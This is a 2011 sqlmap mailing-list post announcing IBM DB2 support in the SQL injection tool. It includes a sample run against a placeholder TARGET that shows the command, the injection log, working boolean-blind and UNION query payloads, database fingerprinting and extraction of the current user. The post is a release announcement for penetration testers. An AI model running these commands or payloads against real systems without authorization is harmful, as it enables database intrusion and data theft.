Hi, Update on IBM DB2 support: payload for time-based has been added[1] last week as well as support for direct connection (-d switch).
[1] https://twitter.com/#!/sqlmap/status/85659702565937152 On 25 June 2011 11:04, Bernardo Damele A. G. <bernardo.dam...@gmail.com> wrote: > Hi, > > The long awaited IBM DB2 support has been implemented in sqlmap. The > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH > and merged in sqlmap repository after some tweaking by us. It is very > stable for both DB2 8.x and 9.x branches. > The patch includes support to fingerprint and enumerate data on IBM > DB2 via boolean-based blind SQL injection and UNION query SQL > injection. Hopefully, soon someone will come up with a payload for > time-based and error-based techniques too. Support for direct > connection to the DBMS (-d switch) will be implemented soon as well. > > Thank you Sebastian and the rest of the team at r-tec for your patch > and support! > > Sample run against an IBM DB2 9.7 test environment: > --8<-- > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user > > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [!] legal disclaimer: usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility > to obey all applicable local, state and federal laws. Authors assume > no liability and are not responsible for any misuse or damage caused > by this program > > [*] starting at 10:56:21 > > [10:56:21] [INFO] using > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' > as session file > [10:56:21] [INFO] testing connection to the target url > [10:56:23] [INFO] heuristics detected web page charset 'ascii' > [10:56:23] [INFO] testing if the url is stable, wait a few seconds > [10:56:25] [INFO] url is stable > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic > [10:56:26] [INFO] GET parameter 'id' is dynamic > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might > be injectable (possible DBMS: DB2) > [10:56:27] [INFO] testing sql injection on GET parameter 'id' > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - > WHERE or HAVING clause' injectable > parsed error message(s) showed that the back-end DBMS could be DB2. Do > you want to skip test payloads specific for other DBMSes? [Y/n] > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - > 1 to 10 columns' injectable > GET parameter 'id' is vulnerable. Do you want to keep testing the others? > [y/N] > sqlmap identified the following injection points with a total of 21 > HTTP(s) requests: > --- > Place: GET > Parameter: id > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh > > Type: UNION query > Title: Generic UNION query (NULL) - 1 to 10 columns > Payload: id=1' UNION ALL SELECT > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) > FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM > --- > > [10:58:58] [INFO] testing IBM DB2 > [10:58:59] [INFO] confirming IBM DB2 > [10:59:12] [INFO] the back-end DBMS is IBM DB2 > web server operating system: Windows > web application technology: PHP 5.3.5, Apache 2.2.17 > back-end DBMS: active fingerprint: IBM DB2 9.7 > html error message fingerprint: DB2 > [10:59:12] [INFO] fetching banner > banner: 'DB2 v9.7.400.501' > > [10:59:13] [INFO] fetching current user > current user: 'TEST' > --8<-- > > Bernardo > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
